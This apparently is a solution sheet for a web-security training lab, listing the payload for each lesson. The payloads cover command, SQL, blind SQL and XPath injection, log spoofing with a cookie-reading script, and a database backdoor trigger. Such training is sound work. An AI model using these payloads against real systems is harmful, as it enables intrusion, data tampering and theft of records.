1. Command Injection
HelpFile=AccessControlMatrix.help" %26 netstat -an %26 ipconfig"
2. Numeric SQL Injection
101 oR 1=1
3. Log Spoofing
Smith%0d%0aLogin Succeeded for username: admin<script>alert(document.cookie)</script>
4. XPATH Injection
String dir = s.getContext().getRealPath("/lessons/XPATHInjection/EmployeesData.xml");
File d = new File(dir);
XPathFactory factory = XPathFactory.newInstance();
XPath xPath = factory.newXPath();
InputSource inputSource = new InputSource(new FileInputStream(d));
String expression = "/employees/employee[loginID/text()='" + username + "' and passwd/text()='" + password + "']";
nodes = (NodeList) xPath.evaluate(expression, inputSource, XPathConstants.NODESET);
This is what the server gets:
expression = "/employees/employee[loginID/text()='Smith' or 1=1 or 'a'='a' and passwd/text()='password']"
And this is how the server interprets it:
expression = "/employees/employee[ ( loginID/text()='Smith' or 1=1 ) OR ( 'a'='a' and passwd/text()='password' ) ]"
Mike' oR 1=1 oR 'a'='a
, Smith' oR 'a'='a
5. LAB: SQL Injection
Stage 1: String SQL Injection
抓包修改password值为 ' or 'a'='a
Stage 2: Parameterized Query #1
Stage 3: Numeric SQL Injection
id值改为101 OR 1=1 ORDER BY salary desc
Stage 4: Parameterized Query #2
6. String SQL Injection
7. Modify Data with SQL Injection
jsmith';update salaries set salary=9999 where userid='jsmith
8. Add Data with SQL Injection
jsmith';insert into salaries(userid,salary) values('test123',99);--
9. Database Backdoors
101;update employee set salary=99000 where password='larry'
CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='john@hackme.com'WHERE userid = NEW.userid
10. Blind Numeric SQL Injection
101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') = 2364 );
11. Blind String SQL Injection
101 AND ((SELECT length(name) FROM pins WHERE cc_number='4321432143214321') = 4 );
$ man ascii
101 AND (substring((SELECT name FROM pins WHERE cc_number='4321432143214321'), 1, 1) = 'J' );
101 AND (substring((SELECT name FROM pins WHERE cc_number='4321432143214321'), 2, 1) = 'i' );
101 AND (substring((SELECT name FROM pins WHERE cc_number='4321432143214321'), 3, 1) = 'l' );
101 AND (substring((SELECT name FROM pins WHERE cc_number='4321432143214321'), 4, 1) = 'l' );